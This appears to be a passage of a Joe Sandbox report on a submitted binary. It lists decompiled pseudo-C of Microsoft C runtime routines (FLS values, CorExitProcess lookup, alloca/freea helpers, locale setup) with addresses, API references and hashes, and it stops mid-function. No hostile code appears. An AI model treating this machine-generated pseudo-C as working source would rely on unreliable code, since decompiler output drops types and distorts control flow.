                                                					_t11 = E001ADB83(_t13,  *0x1d5040);
                                                					_t14 = _t24;
                                                					if(_t11 == 0xffffffff) {
                                                						L5:
                                                						_t11 = 0;
                                                					} else {
                                                						if(_t11 == 0) {
                                                							if(E001ADBBE(_t14,  *0x1d5040, 0xffffffff) != 0) {
                                                								_push(0x28);
                                                								_t28 = E001ADCC3();
                                                								_t18 = 1;
                                                								if(_t28 == 0) {
                                                									L8:
                                                									_t11 = 0;
                                                									E001ADBBE(_t18,  *0x1d5040, 0);
                                                								} else {
                                                									_t8 = E001ADBBE(_t18,  *0x1d5040, _t28);
                                                									_pop(_t18);
                                                									if(_t8 != 0) {
                                                										_t11 = _t28;
                                                										_t28 = 0;
                                                									} else {
                                                										goto L8;
                                                									}
                                                								}
                                                								E001AFB09(_t28);
                                                							} else {
                                                								goto L5;
                                                							}
                                                						}
                                                					}
                                                					SetLastError(_t25);
                                                					return _t11;
                                                				} else {
                                                					return 0;
                                                				}
                                                			}











                                                0x001ac97a
                                                0x001ac981
                                                0x001ac994
                                                0x001ac99b
                                                0x001ac99d
                                                0x001ac9a1
                                                0x001ac9ba
                                                0x001ac9ba
                                                0x001ac9a3
                                                0x001ac9a5
                                                0x001ac9b8
                                                0x001ac9bf
                                                0x001ac9c8
                                                0x001ac9cb
                                                0x001ac9ce
                                                0x001ac9e2
                                                0x001ac9e2
                                                0x001ac9eb
                                                0x001ac9d0
                                                0x001ac9d7
                                                0x001ac9dd
                                                0x001ac9e0
                                                0x001ac9f4
                                                0x001ac9f6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x001ac9e0
                                                0x001ac9f9
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x001ac9b8
                                                0x001ac9a5
                                                0x001aca01
                                                0x001aca0b
                                                0x001ac983
                                                0x001ac985
                                                0x001ac985

                                                APIs
                                                • GetLastError.KERNEL32(?,?,001AC971,001AAF44,001AA237), ref: 001AC988
                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 001AC996
                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 001AC9AF
                                                • SetLastError.KERNEL32(00000000,001AC971,001AAF44,001AA237), ref: 001ACA01
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.347566264.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                • Associated: 00000000.00000002.347556970.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347669983.00000000001C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347876847.0000000000204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                Similarity
                                                • API ID: ErrorLastValue___vcrt_
                                                • String ID:
                                                • API String ID: 3852720340-0
                                                • Opcode ID: 0b6e86090f1d6e349a1506d7acdd109ea3db7277694705a8433d12f317ea78bf
                                                • Instruction ID: 5bc9ae7bdbae0b5bfab97e6542a8b011bb680e8c2f5ecb70447fad7d74ad85a0
                                                • Opcode Fuzzy Hash: 0b6e86090f1d6e349a1506d7acdd109ea3db7277694705a8433d12f317ea78bf
                                                • Instruction Fuzzy Hash: 6A01F73E20FB116EAB252774FC95A2B2F45EB13379730032AF522AA6F0EF514C4096D4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 25%
                                                			E001B3E5B(intOrPtr _a4) {
                                                				char _v16;
                                                				signed int _v20;
                                                				signed int _t11;
                                                				int _t14;
                                                				void* _t16;
                                                				void* _t20;
                                                				int _t22;
                                                				signed int _t23;
                                                
                                                				_t11 =  *0x1d5010; // 0x8121a627
                                                				 *[fs:0x0] =  &_v16;
                                                				_v20 = _v20 & 0x00000000;
                                                				_t14 =  &_v20;
                                                				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t14, _t11 ^ _t23, _t20, _t16,  *[fs:0x0], 0x1c6a9a, 0xffffffff);
                                                				if(_t14 != 0) {
                                                					_t14 = GetProcAddress(_v20, "CorExitProcess");
                                                					_t22 = _t14;
                                                					if(_t22 != 0) {
                                                						 *0x1c7144(_a4);
                                                						_t14 =  *_t22();
                                                					}
                                                				}
                                                				if(_v20 != 0) {
                                                					_t14 = FreeLibrary(_v20);
                                                				}
                                                				 *[fs:0x0] = _v16;
                                                				return _t14;
                                                			}











                                                0x001b3e70
                                                0x001b3e7b
                                                0x001b3e81
                                                0x001b3e85
                                                0x001b3e90
                                                0x001b3e98
                                                0x001b3ea2
                                                0x001b3ea8
                                                0x001b3eac
                                                0x001b3eb3
                                                0x001b3eb9
                                                0x001b3eb9
                                                0x001b3eac
                                                0x001b3ebf
                                                0x001b3ec4
                                                0x001b3ec4
                                                0x001b3ecd
                                                0x001b3ed7

                                                APIs
                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,8121A627,?,?,00000000,001C6A9A,000000FF,?,001B3DEB,001B3F1B,?,001B3DBF,00000000), ref: 001B3E90
                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 001B3EA2
                                                • FreeLibrary.KERNEL32(00000000,?,?,00000000,001C6A9A,000000FF,?,001B3DEB,001B3F1B,?,001B3DBF,00000000), ref: 001B3EC4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.347566264.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                • Associated: 00000000.00000002.347556970.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347669983.00000000001C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347876847.0000000000204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                Similarity
                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                • String ID: CorExitProcess$mscoree.dll
                                                • API String ID: 4061214504-1276376045
                                                • Opcode ID: eafab0aab871dc3ff432bf540ee82cb5a39a775c3ca4ba43ce79145aeb02137f
                                                • Instruction ID: ec0670d08844666ce99fc9e0c11f328f8081a36c3603cf777d2e5138ecfe1e45
                                                • Opcode Fuzzy Hash: eafab0aab871dc3ff432bf540ee82cb5a39a775c3ca4ba43ce79145aeb02137f
                                                • Instruction Fuzzy Hash: 4201A23190462AAFCB128F50CC09FAEBBB8FB04B15F00452AF821E26D0DBB4D940CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 60%
                                                			E001BC276(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
                                                				signed int _v8;
                                                				intOrPtr _v12;
                                                				void* _v24;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t41;
                                                				intOrPtr _t46;
                                                				signed int _t49;
                                                				void* _t52;
                                                				signed int _t56;
                                                				intOrPtr _t65;
                                                				intOrPtr _t70;
                                                				intOrPtr _t71;
                                                				intOrPtr _t73;
                                                				void* _t74;
                                                				intOrPtr _t75;
                                                				void* _t92;
                                                				intOrPtr* _t93;
                                                				void* _t95;
                                                				intOrPtr* _t96;
                                                				intOrPtr* _t98;
                                                				signed int _t99;
                                                				void* _t100;
                                                				intOrPtr* _t101;
                                                				intOrPtr* _t103;
                                                				void* _t106;
                                                
                                                				_push(__ecx);
                                                				_push(__ecx);
                                                				_t41 =  *0x1d5010; // 0x8121a627
                                                				_v8 = _t41 ^ _t99;
                                                				_t73 = _a20;
                                                				if(_t73 > 0) {
                                                					_t71 = E001B30CF(_a16, _t73);
                                                					_t106 = _t71 - _t73;
                                                					_t4 = _t71 + 1; // 0x1
                                                					_t73 = _t4;
                                                					if(_t106 >= 0) {
                                                						_t73 = _t71;
                                                					}
                                                				}
                                                				_t77 = _a32;
                                                				if(_a32 == 0) {
                                                					_t70 =  *((intOrPtr*)( *_a4 + 8));
                                                					_t77 = _t70;
                                                					_a32 = _t70;
                                                				}
                                                				_t46 = E001BDCC5(_t77, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t73, 0, 0);
                                                				_t101 = _t100 + 0x18;
                                                				_v12 = _t46;
                                                				if(_t46 == 0) {
                                                					L41:
                                                					_pop(_t92);
                                                					_pop(_t95);
                                                					_pop(_t74);
                                                					return E001A9545(_t46, _t74, _v8 ^ _t99, 0x400, _t92, _t95);
                                                				} else {
                                                					_t16 = _t46 + _t46 + 8; // 0x8
                                                					asm("sbb eax, eax");
                                                					_t49 = _t46 + _t46 & _t16;
                                                					if(_t49 == 0) {
                                                						_t96 = 0;
                                                						L39:
                                                						_t75 = 0;
                                                						L40:
                                                						E001A9527(_t96);
                                                						_t46 = _t75;
                                                						goto L41;
                                                					}
                                                					if(_t49 > 0x400) {
                                                						_t93 = E001B6429(_t49);
                                                						if(_t93 == 0) {
                                                							L13:
                                                							_t96 = _t93;
                                                							if(_t93 == 0) {
                                                								goto L39;
                                                							}
                                                							_t52 = E001BDCC5(_a32, 1, _a16, _t73, _t93, _v12);
                                                							_t103 = _t101 + 0x18;
                                                							if(_t52 == 0) {
                                                								goto L39;
                                                							}
                                                							_t97 = _v12;
                                                							_t75 = E001B8D6B(_a8, _a12, _t93, _v12, 0, 0, 0, 0, 0);
                                                							if(_t75 == 0) {
                                                								L19:
                                                								_t96 = _t93;
                                                								goto L39;
                                                							}
                                                							if((_a12 & 0x00000400) == 0) {
                                                								_t31 = _t75 + _t75 + 8; // 0x8
                                                								asm("sbb eax, eax");
                                                								_t56 = _t75 + _t75 & _t31;
                                                								if(_t56 == 0) {
                                                									_t98 = 0;
                                                									L37:
                                                									E001A9527(_t98);
                                                									goto L19;
                                                								}
                                                								if(_t56 > 0x400) {
                                                									_t98 = E001B6429(_t56);
                                                									if(_t98 == 0) {
                                                										goto L37;
                                                									}
                                                									 *_t98 = 0xdddd;
                                                									L28:
                                                									_t98 = _t98 + 8;
                                                									if(_t98 == 0 || E001B8D6B(_a8, _a12, _t93, _v12, _t98, _t75, 0, 0, 0) == 0) {
                                                										goto L37;
                                                									} else {
                                                										_push(0);
                                                										_push(0);
                                                										if(_a28 != 0) {
                                                											_push(_a28);
                                                											_push(_a24);
                                                										} else {
                                                											_push(0);
                                                											_push(0);
                                                										}
                                                										_push(_t75);
                                                										_push(_t98);
                                                										_push(0);
                                                										_push(_a32);
                                                										_t75 = E001BDD41();
                                                										if(_t75 == 0) {
                                                											goto L37;
                                                										} else {
                                                											E001A9527(_t98);
                                                											L34:
                                                											_t96 = _t93;
                                                											goto L40;
                                                										}
                                                									}
                                                								}
                                                								E001A9B20(_t56);
                                                								_t98 = _t103;
                                                								if(_t98 == 0) {
                                                									goto L37;
                                                								}
                                                								 *_t98 = 0xcccc;
                                                								goto L28;
                                                							}
                                                							_t65 = _a28;
                                                							if(_t65 == 0) {
                                                								goto L34;
                                                							}
                                                							if(_t75 <= _t65) {
                                                								_t75 = E001B8D6B(_a8, _a12, _t93, _t97, _a24, _t65, 0, 0, 0);
                                                								if(_t75 != 0) {
                                                									goto L34;
                                                								}
                                                							}
                                                							goto L19;
                                                						}
                                                						 *_t93 = 0xdddd;
                                                						L12:
                                                						_t93 = _t93 + 8;
                                                						goto L13;
                                                					}
                                                					E001A9B20(_t49);
                                                					_t93 = _t101;
                                                					if(_t93 == 0) {
                                                						goto L13;
                                                					}
                                                					 *_t93 = 0xcccc;
                                                					goto L12;
                                                				}
                                                			}






























                                                0x001bc27b
                                                0x001bc27c
                                                0x001bc27d
                                                0x001bc284
                                                0x001bc288
                                                0x001bc28f
                                                0x001bc295
                                                0x001bc29b
                                                0x001bc29e
                                                0x001bc29e
                                                0x001bc2a1
                                                0x001bc2a3
                                                0x001bc2a3
                                                0x001bc2a1
                                                0x001bc2a5
                                                0x001bc2aa
                                                0x001bc2b1
                                                0x001bc2b4
                                                0x001bc2b6
                                                0x001bc2b6
                                                0x001bc2d2
                                                0x001bc2d7
                                                0x001bc2da
                                                0x001bc2df
                                                0x001bc452
                                                0x001bc455
                                                0x001bc456
                                                0x001bc457
                                                0x001bc463
                                                0x001bc2e5
                                                0x001bc2e7
                                                0x001bc2ec
                                                0x001bc2ee
                                                0x001bc2f0
                                                0x001bc445
                                                0x001bc447
                                                0x001bc447
                                                0x001bc449
                                                0x001bc44a
                                                0x001bc450
                                                0x00000000
                                                0x001bc450
                                                0x001bc2fb
                                                0x001bc316
                                                0x001bc31b
                                                0x001bc326
                                                0x001bc326
                                                0x001bc32a
                                                0x00000000
                                                0x00000000
                                                0x001bc33d
                                                0x001bc342
                                                0x001bc347
                                                0x00000000
                                                0x00000000
                                                0x001bc34d
                                                0x001bc364
                                                0x001bc368
                                                0x001bc383
                                                0x001bc383
                                                0x00000000
                                                0x001bc383
                                                0x001bc372
                                                0x001bc3af
                                                0x001bc3b4
                                                0x001bc3b6
                                                0x001bc3b8
                                                0x001bc437
                                                0x001bc439
                                                0x001bc43a
                                                0x00000000
                                                0x001bc43f
                                                0x001bc3bc
                                                0x001bc3d7
                                                0x001bc3dc
                                                0x00000000
                                                0x00000000
                                                0x001bc3de
                                                0x001bc3e4
                                                0x001bc3e4
                                                0x001bc3e9
                                                0x00000000
                                                0x001bc405
                                                0x001bc407
                                                0x001bc408
                                                0x001bc40c
                                                0x001bc42f
                                                0x001bc432
                                                0x001bc40e
                                                0x001bc40e
                                                0x001bc40f
                                                0x001bc40f
                                                0x001bc410
                                                0x001bc411
                                                0x001bc412
                                                0x001bc413
                                                0x001bc41b
                                                0x001bc422
                                                0x00000000
                                                0x001bc424
                                                0x001bc425
                                                0x001bc42b
                                                0x001bc42b
                                                0x00000000
                                                0x001bc42b
                                                0x001bc422
                                                0x001bc3e9
                                                0x001bc3be
                                                0x001bc3c3
                                                0x001bc3c7
                                                0x00000000
                                                0x00000000
                                                0x001bc3c9
                                                0x00000000
                                                0x001bc3c9
                                                0x001bc374
                                                0x001bc379
                                                0x00000000
                                                0x00000000
                                                0x001bc381
                                                0x001bc3a0
                                                0x001bc3a4
                                                0x00000000
                                                0x00000000
                                                0x001bc3aa
                                                0x00000000
                                                0x001bc381
                                                0x001bc31d
                                                0x001bc323
                                                0x001bc323
                                                0x00000000
                                                0x001bc323
                                                0x001bc2fd
                                                0x001bc302
                                                0x001bc306
                                                0x00000000
                                                0x00000000
                                                0x001bc308
                                                0x00000000
                                                0x001bc308

                                                APIs
                                                • __alloca_probe_16.LIBCMT ref: 001BC2FD
                                                • __alloca_probe_16.LIBCMT ref: 001BC3BE
                                                • __freea.LIBCMT ref: 001BC425
                                                  • Part of subcall function 001B6429: RtlAllocateHeap.NTDLL(00000000,?,?,?,001A956D,?,?,001A5EC7,?,001A1573,?), ref: 001B645B
                                                • __freea.LIBCMT ref: 001BC43A
                                                • __freea.LIBCMT ref: 001BC44A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.347566264.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                • Associated: 00000000.00000002.347556970.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347669983.00000000001C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347876847.0000000000204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                Similarity
                                                • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                • String ID:
                                                • API String ID: 1423051803-0
                                                • Opcode ID: f15f7009144036214546f623809b8c59a4fefd878e4e312fa632fea2fe77917b
                                                • Instruction ID: 899cebdbb25c7883a0b4279aee5ad6fe434ebf5f3c601dd830f486ae049a1bf0
                                                • Opcode Fuzzy Hash: f15f7009144036214546f623809b8c59a4fefd878e4e312fa632fea2fe77917b
                                                • Instruction Fuzzy Hash: FF51DF7260020AAFEB259EA4DC82EFF7AA9EF98350B554129FD04D6251EB70CD50C7E0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 66%
                                                			E001A5170(void* __ebx, void* __edi, signed int _a4) {
                                                				signed int _v4;
                                                				char _v8;
                                                				char _v12;
                                                				signed int _v16;
                                                				char _v20;
                                                				signed int _v24;
                                                				signed int _v28;
                                                				void* _v32;
                                                				signed int _v40;
                                                				signed int _v48;
                                                				char _v52;
                                                				char _v56;
                                                				void* _v64;
                                                				void* _v68;
                                                				void* _v72;
                                                				void* _v76;
                                                				signed int _v132;
                                                				signed int _v144;
                                                				signed int _v148;
                                                				signed int _v156;
                                                				signed int _v160;
                                                				signed int _v164;
                                                				signed int _v168;
                                                				signed int _v172;
                                                				signed int _v176;
                                                				void* _v180;
                                                				intOrPtr _v184;
                                                				intOrPtr _v188;
                                                				void* _v192;
                                                				void* _v196;
                                                				void* _v200;
                                                				void* _v204;
                                                				void* _v216;
                                                				void* _v220;
                                                				void* __esi;
                                                				signed int _t113;
                                                				void* _t120;
                                                				signed int _t127;
                                                				signed int _t135;
                                                				intOrPtr _t139;
                                                				signed int _t144;
                                                				void* _t153;
                                                				signed int _t157;
                                                				signed int _t158;
                                                				signed int _t159;
                                                				signed int _t160;
                                                				signed int _t161;
                                                				signed int _t162;
                                                				void* _t173;
                                                				signed int _t178;
                                                				signed int _t179;
                                                				signed int _t180;
                                                				unsigned int _t182;
                                                				void* _t183;
                                                				char* _t194;
                                                				signed int _t197;
                                                				signed int _t199;
                                                				void* _t203;
                                                				signed int _t208;
                                                				signed int _t209;
                                                				signed int _t211;
                                                				void* _t212;
                                                				signed int* _t213;
                                                				signed int _t214;
                                                				signed int _t215;
                                                				void* _t216;
                                                				signed int* _t220;
                                                				intOrPtr _t226;
                                                				intOrPtr _t231;
                                                				signed int _t239;
                                                				void* _t241;
                                                				signed int _t246;
                                                				intOrPtr _t247;
                                                				signed int _t249;
                                                				void* _t250;
                                                				signed int _t251;
                                                				void* _t252;
                                                				signed int _t253;
                                                				signed int _t255;
                                                				signed int _t258;
                                                				signed int _t261;
                                                				void* _t262;
                                                				signed int _t263;
                                                				void* _t264;
                                                				signed int _t265;
                                                				signed int _t273;
                                                				signed int _t275;
                                                				signed int _t276;
                                                				void* _t282;
                                                				signed int _t283;
                                                				void* _t285;
                                                				void* _t286;
                                                				signed int _t287;
                                                				void* _t289;
                                                				void* _t292;
                                                				void* _t294;
                                                				void* _t300;
                                                
                                                				_t283 = _t282 - 0x18;
                                                				_t113 =  *0x1d5010; // 0x8121a627
                                                				_v4 = _t113 ^ _t283;
                                                				_push(__ebx);
                                                				_push(__edi);
                                                				_v16 = _a4;
                                                				E001A612A( &_v8, 0);
                                                				_t249 =  *0x203578; // 0x4
                                                				_t211 =  *0x20356c; // 0xb13410
                                                				_v24 = _t211;
                                                				if(_t249 == 0) {
                                                					E001A612A( &_v12, _t249);
                                                					_t300 =  *0x203578 - _t249; // 0x4
                                                					if(_t300 == 0) {
                                                						_t208 =  *0x202708; // 0x4
                                                						_t209 = _t208 + 1;
                                                						 *0x202708 = _t209;
                                                						 *0x203578 = _t209;
                                                					}
                                                					E001A6182( &_v12);
                                                					_t249 =  *0x203578; // 0x4
                                                				}
                                                				_t220 = _a4;
                                                				_t273 = _t249 * 4;
                                                				if(_t249 >= _t220[3]) {
                                                					_t261 = 0;
                                                					__eflags = 0;
                                                					goto L8;
                                                				} else {
                                                					_t261 =  *(_t220[2] + _t273);
                                                					if(_t261 != 0) {
                                                						L16:
                                                						E001A6182( &_v8);
                                                						_pop(_t250);
                                                						_pop(_t262);
                                                						_pop(_t212);
                                                						return E001A9545(_t261, _t212, _v4 ^ _t283, _t245, _t250, _t262);
                                                					} else {
                                                						L8:
                                                						if(_t220[5] == 0) {
                                                							L11:
                                                							if(_t261 != 0) {
                                                								goto L16;
                                                							} else {
                                                								goto L12;
                                                							}
                                                						} else {
                                                							_t203 = E001A6477();
                                                							if(_t249 >=  *((intOrPtr*)(_t203 + 0xc))) {
                                                								L12:
                                                								if(_t211 == 0) {
                                                									_push(_v16);
                                                									_t120 = E001A59A0(_t211, _t245,  &_v20);
                                                									_t285 = _t283 + 8;
                                                									__eflags = _t120 - 0xffffffff;
                                                									if(__eflags == 0) {
                                                										E001A1910();
                                                										asm("int3");
                                                										asm("int3");
                                                										asm("int3");
                                                										asm("int3");
                                                										_t286 = _t285 - 0xc;
                                                										_t246 = _v28;
                                                										_push(_t211);
                                                										_t213 = _t220;
                                                										 *((intOrPtr*)(_t286 + 0xc)) = _v20;
                                                										_push(_t273);
                                                										_t275 = _t213[4];
                                                										__eflags = 0x7fffffff - _t275 - _t246;
                                                										if(__eflags < 0) {
                                                											E001A13F0(0x7fffffff, __eflags);
                                                											goto L39;
                                                										} else {
                                                											_push(_t261);
                                                											_t261 = _t213[5];
                                                											_t180 = _t246 + _t275;
                                                											_push(_t249);
                                                											 *(_t286 + 0x10) = _t180;
                                                											_t255 = _t180 | 0x0000000f;
                                                											_v40 = _t261;
                                                											__eflags = _t255 - 0x7fffffff;
                                                											if(_t255 <= 0x7fffffff) {
                                                												_t182 = _t261 >> 1;
                                                												__eflags = _t261 - 0x7fffffff - _t182;
                                                												if(_t261 <= 0x7fffffff - _t182) {
                                                													_t183 = _t182 + _t261;
                                                													__eflags = _t255 - _t183;
                                                													_t249 =  <  ? _t183 : _t255;
                                                													_t33 = _t249 + 1; // 0x80000000
                                                													_t239 = _t33;
                                                													__eflags = _t239 - 0x1000;
                                                													if(_t239 < 0x1000) {
                                                														__eflags = _t239;
                                                														if(__eflags == 0) {
                                                															_t261 = 0;
                                                															__eflags = 0;
                                                														} else {
                                                															_t197 = E001A9553(_t261, __eflags, _t239);
                                                															_t286 = _t286 + 4;
                                                															_t261 = _t197;
                                                														}
                                                														goto L32;
                                                													} else {
                                                														_t34 = _t239 + 0x23; // 0x80000023
                                                														_t198 = _t34;
                                                														__eflags = _t34 - _t239;
                                                														if(__eflags <= 0) {
                                                															L39:
                                                															E001A1370();
                                                															goto L40;
                                                														} else {
                                                															goto L22;
                                                														}
                                                													}
                                                												} else {
                                                													_t249 = 0x7fffffff;
                                                													goto L21;
                                                												}
                                                											} else {
                                                												_t249 = 0x7fffffff;
                                                												L21:
                                                												_t198 = 0xffffffff80000023;
                                                												__eflags = 0x80000000;
                                                												L22:
                                                												_t199 = E001A9553(_t261, __eflags, _t198);
                                                												_t286 = _t286 + 4;
                                                												__eflags = _t199;
                                                												if(_t199 == 0) {
                                                													L40:
                                                													L80();
                                                													asm("int3");
                                                													_t287 = _t286 - 0x88;
                                                													_t127 =  *0x1d5010; // 0x8121a627
                                                													_v48 = _t127 ^ _t287;
                                                													_push(_t213);
                                                													_t214 = _v40;
                                                													_push(_t275);
                                                													_push(_t261);
                                                													_push(_t249);
                                                													 *((intOrPtr*)(_t287 + 0x48)) = _t214;
                                                													E001A612A( &_v56, 0);
                                                													_t251 =  *0x20271c; // 0x1
                                                													_t276 =  *0x203570; // 0xb12ad8
                                                													__eflags = _t251;
                                                													if(_t251 == 0) {
                                                														E001A612A( &_v52, _t251);
                                                														__eflags =  *0x20271c - _t251; // 0x1
                                                														if(__eflags == 0) {
                                                															_t178 =  *0x202708; // 0x4
                                                															_t179 = _t178 + 1;
                                                															__eflags = _t179;
                                                															 *0x202708 = _t179;
                                                															 *0x20271c = _t179;
                                                														}
                                                														E001A6182( &_v52);
                                                														_t251 =  *0x20271c; // 0x1
                                                													}
                                                													_t226 =  *((intOrPtr*)(_t214 + 4));
                                                													_t215 = _t251 * 4;
                                                													__eflags = _t251 -  *((intOrPtr*)(_t226 + 0xc));
                                                													if(_t251 >=  *((intOrPtr*)(_t226 + 0xc))) {
                                                														_t263 = 0;
                                                														__eflags = 0;
                                                														goto L49;
                                                													} else {
                                                														_t263 =  *(_t215 +  *((intOrPtr*)(_t226 + 8)));
                                                														__eflags = _t263;
                                                														if(_t263 == 0) {
                                                															L49:
                                                															__eflags =  *((char*)(_t226 + 0x14));
                                                															if( *((char*)(_t226 + 0x14)) == 0) {
                                                																L52:
                                                																__eflags = _t263;
                                                																if(_t263 != 0) {
                                                																	goto L47;
                                                																} else {
                                                																	goto L53;
                                                																}
                                                															} else {
                                                																_t173 = E001A6477();
                                                																__eflags = _t251 -  *((intOrPtr*)(_t173 + 0xc));
                                                																if(_t251 >=  *((intOrPtr*)(_t173 + 0xc))) {
                                                																	L53:
                                                																	__eflags = _t276;
                                                																	if(__eflags == 0) {
                                                																		_t263 = E001A9553(_t263, __eflags, 0x44);
                                                																		_t289 = _t287 + 4;
                                                																		_t135 =  *( *((intOrPtr*)(_t289 + 0x44)) + 4);
                                                																		__eflags = _t135;
                                                																		if(_t135 == 0) {
                                                																			_t253 = 0x1d245f;
                                                																		} else {
                                                																			_t253 =  *(_t135 + 0x18);
                                                																			__eflags = _t253;
                                                																			if(_t253 == 0) {
                                                																				_t253 = _t135 + 0x1c;
                                                																			}
                                                																		}
                                                																		E001A612A( &_v176, 0);
                                                																		_v176 = 0;
                                                																		_v172 = 0;
                                                																		_v168 = 0;
                                                																		_v164 = 0;
                                                																		_v160 = 0;
                                                																		_v156 = 0;
                                                																		 *((intOrPtr*)(_t289 + 0x2c)) = 0;
                                                																		_v148 = 0;
                                                																		_v144 = 0;
                                                																		 *((char*)(_t289 + 0x38)) = 0;
                                                																		 *((intOrPtr*)(_t289 + 0x3c)) = 0;
                                                																		_v132 = 0;
                                                																		__eflags = _t253;
                                                																		if(_t253 == 0) {
                                                																			E001A62F1("bad locale name");
                                                																			asm("int3");
                                                																			asm("int3");
                                                																			asm("int3");
                                                																			asm("int3");
                                                																			asm("int3");
                                                																			asm("int3");
                                                																			asm("int3");
                                                																			asm("int3");
                                                																			asm("int3");
                                                																			asm("int3");
                                                																			asm("int3");
                                                																			asm("int3");
                                                																			asm("int3");
                                                																			asm("int3");
                                                																			_t231 = _v184;
                                                																			_t139 = _v188;
                                                																			__eflags = _t231 - 0x1000;
                                                																			if(_t231 < 0x1000) {
                                                																				L77:
                                                																				_v184 = _t231;
                                                																				_v188 = _t139;
                                                																				_push(_t276);
                                                																				return L001A9F7A(_v188);
                                                																			} else {
                                                																				_t247 =  *((intOrPtr*)(_t139 - 4));
                                                																				_t231 = _t231 + 0x23;
                                                																				__eflags = _t139 - _t247 + 0xfffffffc - 0x1f;
                                                																				if(_t139 - _t247 + 0xfffffffc > 0x1f) {
                                                																					_push(_t263);
                                                																					_t265 = _t263 ^ _t263;
                                                																					E001AFD8F(_t265, _t265, _t265, _t265, _t265);
                                                																					_push(_t265);
                                                																					_push(_t265);
                                                																					_push(_t265);
                                                																					_push(_t265);
                                                																					_push(_t265);
                                                																					L81();
                                                																					asm("int3");
                                                																					_t144 = IsProcessorFeaturePresent(0x17);
                                                																					__eflags = _t144;
                                                																					if(_t144 != 0) {
                                                																						_push(5);
                                                																						asm("int 0x29");
                                                																					}
                                                																					_push(_t265);
                                                																					E001AFC47(_t215, _t247, 0xc0000417, 2, 0xc0000417, 1);
                                                																					return TerminateProcess(GetCurrentProcess(), 0xc0000417);
                                                																				} else {
                                                																					_t139 = _t247;
                                                																					goto L77;
                                                																				}
                                                																			}
                                                																		} else {
                                                																			E001A657D( &_v176,  &_v176, _t253);
                                                																			 *(_t263 + 4) = 0;
                                                																			 *_t263 = 0x1c72dc;
                                                																			E001A8D38(_t253, _t263, __eflags, _t289 + 0x50);
                                                																			_t292 = _t289 + 0xc;
                                                																			asm("movups xmm0, [eax]");
                                                																			asm("movups [esi+0x8], xmm0");
                                                																			_t153 = E001A8EAF(_t292 + 0x58);
                                                																			asm("movups xmm0, [eax]");
                                                																			asm("movups [esi+0x18], xmm0");
                                                																			asm("movups xmm0, [eax+0x10]");
                                                																			asm("movups [esi+0x28], xmm0");
                                                																			asm("movq xmm0, [eax+0x20]");
                                                																			asm("movq [esi+0x38], xmm0");
                                                																			 *((intOrPtr*)(_t263 + 0x40)) =  *((intOrPtr*)(_t153 + 0x28));
                                                																			E001A65C8( &_v176,  &_v176);
                                                																			_t157 = _v132;
                                                																			_t294 = _t292 + 8;
                                                																			__eflags = _t157;
                                                																			if(_t157 != 0) {
                                                																				E001AFB09(_t157);
                                                																				_t294 = _t294 + 4;
                                                																			}
                                                																			_t158 =  *(_t294 + 0x34);
                                                																			_v132 = 0;
                                                																			__eflags = _t158;
                                                																			if(_t158 != 0) {
                                                																				E001AFB09(_t158);
                                                																				_t294 = _t294 + 4;
                                                																			}
                                                																			_t159 = _v148;
                                                																			 *(_t294 + 0x34) = 0;
                                                																			__eflags = _t159;
                                                																			if(_t159 != 0) {
                                                																				E001AFB09(_t159);
                                                																				_t294 = _t294 + 4;
                                                																			}
                                                																			_t160 = _v156;
                                                																			_v148 = 0;
                                                																			__eflags = _t160;
                                                																			if(_t160 != 0) {
                                                																				E001AFB09(_t160);
                                                																				_t294 = _t294 + 4;
                                                																			}
                                                																			_t161 = _v164;
                                                																			_v156 = 0;
                                                																			__eflags = _t161;
                                                																			if(_t161 != 0) {
                                                																				E001AFB09(_t161);
                                                																				_t294 = _t294 + 4;
                                                																			}
                                                																			_t162 = _v172;
                                                																			_v164 = 0;
                                                																			__eflags = _t162;
                                                																			if(_t162 != 0) {
                                                																				E001AFB09(_t162);
